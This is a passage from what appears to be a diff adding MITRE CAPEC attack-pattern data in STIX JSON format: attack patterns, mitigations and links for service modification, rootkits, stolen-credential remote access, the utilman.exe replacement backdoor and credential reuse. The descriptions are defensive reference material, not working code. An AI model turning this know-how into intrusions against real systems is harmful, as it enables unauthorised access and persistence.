"2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit privileges of user accounts so new service creation can only be performed by authorized administrators.", + "id": "course-of-action--ed7ccb18-f2f9-4895-b561-75c72e739be9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-550-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f2eb507a-dfa5-4dd3-8046-bcd8964aa9ec", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ed7ccb18-f2f9-4895-b561-75c72e739be9", + "spec_version": "2.1", + "target_ref": "attack-pattern--aef8e9e0-4714-4890-9470-06276c61abfd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.", + "external_references": [ + { + "external_id": "CAPEC-551", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/551.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "description": "Create or Modify System Process", + "external_id": "T1543", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543" + } + ], + "id": "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Modify Existing Service", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit privileges of user accounts so service changes can only be performed by authorized administrators. Also monitor any service changes that may occur inadvertently.", + "id": "course-of-action--f3d72fe1-750b-47c0-9526-4728852a4e5b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-551-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0245e1a-1d11-480f-a078-397f1133e3d3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f3d72fe1-750b-47c0-9526-4728852a4e5b", + "spec_version": "2.1", + "target_ref": "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authentication to install malware that alters the functionality and information provide by targeted operating system API calls. Often referred to as rootkits, it is often used to hide the presence of programs, files, network connections, services, drivers, and other system components.", + "external_references": [ + { + "external_id": "CAPEC-552", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/552.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Rootkit", + "external_id": "T1014", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1014" + }, + { + "description": "Pre-OS Boot:Bootkit", + "external_id": "T1542.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1542/003" + }, + { + "description": "Boot or Logon Autostart Execution:Kernel Modules and Extensions", + "external_id": "T1547.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1547/006" + } + ], + "id": "attack-pattern--79037ec7-444c-42cb-a64b-fb4b4f6bd156", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Install Rootkit ", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A rootkit may take the form of a hypervisor. A hypervisor is a software layer that sits between the operating system and the processor. It presents a virtual running environment to the operating system. An example of a common hypervisor is Xen. Because a hypervisor operates at a level below the operating system it can hide its existence from the operating system.", + "Similar to a rootkit, a bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent adversary access to privileged accounts necessary to install rootkits.", + "id": "course-of-action--7b0746b7-4370-4dbd-9a32-96187b4ac73f", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-552-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4d2cd3db-aad4-4f8f-b45c-6841ffaeef34", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b0746b7-4370-4dbd-9a32-96187b4ac73f", + "spec_version": "2.1", + "target_ref": "attack-pattern--79037ec7-444c-42cb-a64b-fb4b4f6bd156", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-12-07T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attacks a system by bypassing some or all functionality intended to protect it. Often, a system user will think that protection is in place, but the functionality behind those protections has been disabled by the adversary.", + "external_references": [ + { + "external_id": "CAPEC-554", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/554.html" + }, + { + "external_id": "CWE-424", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/424.html" + }, + { + "external_id": "CWE-1299", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1299.html" + } + ], + "id": "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Functionality Bypass", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce", + "attack-pattern--ed57f38c-2f0c-47ad-a6e2-16932fde978f", + "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. Once access is gained, any number of malicious activities could be performed.", + "external_references": [ + { + "external_id": "CAPEC-555", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/555.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Remote Services", + "external_id": "T1021", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1021" + }, + { + "description": "Email Collection:Remote Email Collection", + "external_id": "T1114.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1114/002" + }, + { + "description": "External Remote Services", + "external_id": "T1133", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1133" + } + ], + "id": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Remote Services with Stolen Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS. Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.", + "Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable RDP, telnet, SSH and enable firewall rules to block such traffic. Limit users and accounts that have remote interactive login access. Remove the Local Administrators group from the list of groups allowed to login through RDP. Limit remote user permissions. Use remote desktop gateways and multifactor authentication for remote logins.", + "id": "course-of-action--3c080d71-9309-4804-877c-86e391e4b059", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-555-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c080d71-9309-4804-877c-86e391e4b059", + "spec_version": "2.1", + "target_ref": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When a file is opened, its file handler is checked to determine which program opens the file. File handlers are configuration properties of many operating systems. Applications can modify the file handler for a given file extension to call an arbitrary program when a file with the given extension is opened.", + "external_references": [ + { + "external_id": "CAPEC-556", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/556.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Event Triggered Execution:Change Default File Association", + "external_id": "T1546.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1546/001" + } + ], + "id": "attack-pattern--ccb9c607-8bfe-4141-8843-356453179da7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Replace File Extension Handlers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Inspect registry for changes. Limit privileges of user accounts so changes to default file handlers can only be performed by authorized administrators.", + "id": "course-of-action--4709dd63-ad1f-4755-b03a-b1441d4a3f50", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-556-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--96425e94-0d20-4e81-a5f2-950f705d5102", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4709dd63-ad1f-4755-b03a-b1441d4a3f50", + "spec_version": "2.1", + "target_ref": "attack-pattern--ccb9c607-8bfe-4141-8843-356453179da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because it is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-557", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/557.html" + } + ], + "id": "attack-pattern--ccf63cb4-ae14-4c51-a379-9dd09be8f078", + "modified": "2020-07-30T00:00:00.000Z", + "name": "DEPRECATED: Schedule Software To Run", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits weaknesses in privilege management or access control to replace a trusted executable with a malicious version and enable the execution of malware when that trusted executable is called.", + "external_references": [ + { + "external_id": "CAPEC-558", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/558.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Server Software Component: Terminal Services DLL", + "external_id": "T1505.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/005" + }, + { + "description": "Event Triggered Execution: Accessibility Features", + "external_id": "T1546.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1546/008" + } + ], + "id": "attack-pattern--d9069913-2a5f-4ad5-878e-73181f0b1067", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Replace Trusted Executable", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Specific versions of Windows contain accessibility features that may be launched with a key combination before a user has logged in (for example when they are on the Windows Logon screen). On Windows XP and Windows Server 2003/R2, the program (e.g. \"C:\\Windows\\System32\\utilman.exe\") may be replaced with cmd.exe (or another program that provides backdoor access). Then pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over RDP will cause the replaced file to be executed with SYSTEM privileges." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, the adversary sends disruptive signals at a target satellite using a rogue uplink station to disrupt the intended transmission. Those within the satellite's footprint are prevented from reaching the satellite's targeted or neighboring channels. The satellite's footprint size depends upon its position in the sky; higher orbital satellites cover multiple continents.", + "external_references": [ + { + "external_id": "CAPEC-559", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/559.html" + }, + { + "description": "Small Media, Satellite Jamming in Iran: A War over Airwaves, 2012--11", + "external_id": "REF-462", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--7a6e0e5c-f18e-4612-aaa6-68bdeb378b31", + "modified": "2017-01-12T00:00:00.000Z", + "name": "Orbital Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a" + ], + "x_capec_consequences": { + "Availability": [ + "Other (A successful attack will deny the availability of the satellite communications for authorized users.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "This attack requires the knowledge of the satellite's coordinates for targeting." + ], + "x_capec_resources_required": [ + "A satellite uplink station." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-207 : Removing Important Client Functionality. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-56", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/56.html" + } + ], + "id": "attack-pattern--86daf34c-5e2b-49d7-b579-cfde98c462ac", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Removing/short-circuiting 'guard logic'", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary guesses or obtains (i.e. steals or purchases) legitimate credentials (e.g. userID/password) to achieve authentication and to perform authorized actions under the guise of an authenticated user or service.\n ", + "external_references": [ + { + "external_id": "CAPEC-560", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/560.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-1273", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1273.html" + }, + { + "description": "Valid Accounts", + "external_id": "T1078", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1078" + }, + { + "description": "Attractive Accounts for Credential Theft, 2017--05---31, Microsoft Corporation", + "external_id": "REF-570", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/attractive-accounts-for-credential-theft?redirectedfrom=MSDN" + }, + { + "description": "Feike Hacquebord, Two Years of Pawn Storm: Examining an Increasingly Relevant Threat, 2017--04---25, Trend Micro", + "external_id": "REF-571", + "source_name": "reference_from_CAPEC", + "url": "https://documents.trendmicro.com/assets/wp/wp-two-years-of-pawn-storm.pdf" + }, + { + "description": "Corporate IoT – a path to intrusion, 2019--10---05, Microsoft Security Response Center (MSRC)", + "external_id": "REF-572", + "source_name": "reference_from_CAPEC", + "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion" + }, + { + "description": "Brendan McKeague, Van Ta, Ben Fedore, Geoff Ackerman, Alex Pennino, Andrew Thompson, Douglas Bienstock, Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware, 2019--04---05, Microsoft Security Response Center (MSRC)", + "external_id": "REF-573", + "source_name": "reference_from_CAPEC", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + } + ], + "id": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Known Domain Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--c2a87533-3c81-40b3-b529-9560c644f70d", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "Throughout 2015 and 2016, APT28 — also known as Pawn Storm, Sednit, Fancy Bear, Sofacy, and STRONTIUM — leveraged stolen credentials to infiltrate the Democratic National Committee (DNC), the United States Army, the World Anti-Doping Agency (WADA), the Court of Arbitration for Sport (TAS-CAS), and more. In most cases, the legitimate credentials were obtained via calculated spearphishing, tabnabbing, and DNS attacks targeted at corporate webmail systems. APT28 also executed several watering hole attacks, in addition to exploiting several zero-day vulnerabilities within Flash and Windows. The stolen credentials were then utilized to maintain authenticated access, laterally move within the local network, and exfiltrate sensitive information including DNC emails and personal medical records of numerous athletes. [REF-571]", + "In early 2019, FIN6 exploited stolen credentials from an organization within the engineering industry to laterally move within an environment via the Windows’ Remote Desktop Protocol (RDP). Multiple servers were subsequently infected with malware to create malware distribution servers, which were used to distribute the LockerGoga ransomware. [REF-573]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known credentials: The adversary must obtain known credentials in order to access the target system, application, or service.

    2. Techniques
    An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.
    An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
    An adversary conducts a sniffing attack to steal credentials as they are transmitted.
    An adversary gains access to a database and exfiltrates password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.

  2. Determine target's password policy: Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.

    3. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account).

Experiment

  1. Attempt authentication: Try each credential until the target grants access.

    2. Techniques
    Manually or automatically enter each credential through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks leveraging trusted credentials typically result in the adversary laterally moving within the local network, since users are often allowed to login to systems/applications within the network using the same password. This further allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.\n Attacks on known passwords generally rely on the primary fact that users often reuse the same username/password combination for a variety of systems, applications, and services, coupled with poor password policies on the target system or application. Adversaries can also utilize known passwords to target Single Sign On (SSO) or cloud-based applications and services, which often don't verify the authenticity of the user's input. Known credentials are usually obtained by an adversary via a system/application breach and/or by purchasing dumps of credentials on the dark web. These credentials may be further gleaned via exposed configuration and properties files that contain system passwords, database connection strings, and other sensitive data.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target." + ], + "x_capec_resources_required": [ + "A list of known credentials.", + "A custom script that leverages the credential list to launch an attack." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known credential, leveraging it is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network.", + "id": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e3e578d6-8b57-4c74-a939-800e0cf7a45b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6395a05b-7097-429d-878c-c8c1f5d4beb4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure users are not reusing username/password combinations for multiple systems, applications, or services.", 